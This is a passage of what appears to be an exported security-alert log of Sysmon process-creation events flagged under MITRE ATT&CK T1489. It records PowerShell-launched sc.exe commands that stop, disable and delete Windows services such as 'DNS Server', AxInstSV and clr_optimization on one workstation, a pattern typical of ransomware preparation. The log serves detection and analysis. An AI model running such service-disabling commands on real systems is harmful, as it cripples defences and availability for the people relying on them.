\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.926"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010dc491e00}"",""processId"":""7300"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.212",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.910 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00100b491e00} +ProcessId: 8100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Serhiez 
Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.913491900Z"",""eventRecordID"":""2449"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.910\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00100b491e00}\r\nProcessId: 8100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.910"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00100b491e00}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Serhiez Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.181",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.878 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00104f471e00} +ProcessId: 7284 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.881186000Z"",""eventRecordID"":""2447"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.878\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00104f471e00}\r\nProcessId: 7284\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.878"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00104f471e00}"",""processId"":""7284"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.134",8,"ATT&CK T1489: Stop Windows 
Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.828 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010ab441e00} +ProcessId: 3908 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.830839100Z"",""eventRecordID"":""2444"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.828\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010ab441e00}\r\nProcessId: 3908\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 
Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.828"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010ab441e00}"",""processId"":""3908"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.103",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.785 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010e0421e00} +ProcessId: 2432 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 
AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.788392400Z"",""eventRecordID"":""2442"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.785\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010e0421e00}\r\nProcessId: 2432\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.785"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010e0421e00}"",""processId"":""2432"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.088",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.772 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-001018421e00} +ProcessId: 4200 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.775636500Z"",""eventRecordID"":""2441"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.772\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-001018421e00}\r\nProcessId: 4200\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:02.772"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-001018421e00}"",""processId"":""4200"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.027",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.719 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010843f1e00} +ProcessId: 6308 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.725883500Z"",""eventRecordID"":""2438"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.719\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010843f1e00}\r\nProcessId: 6308\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
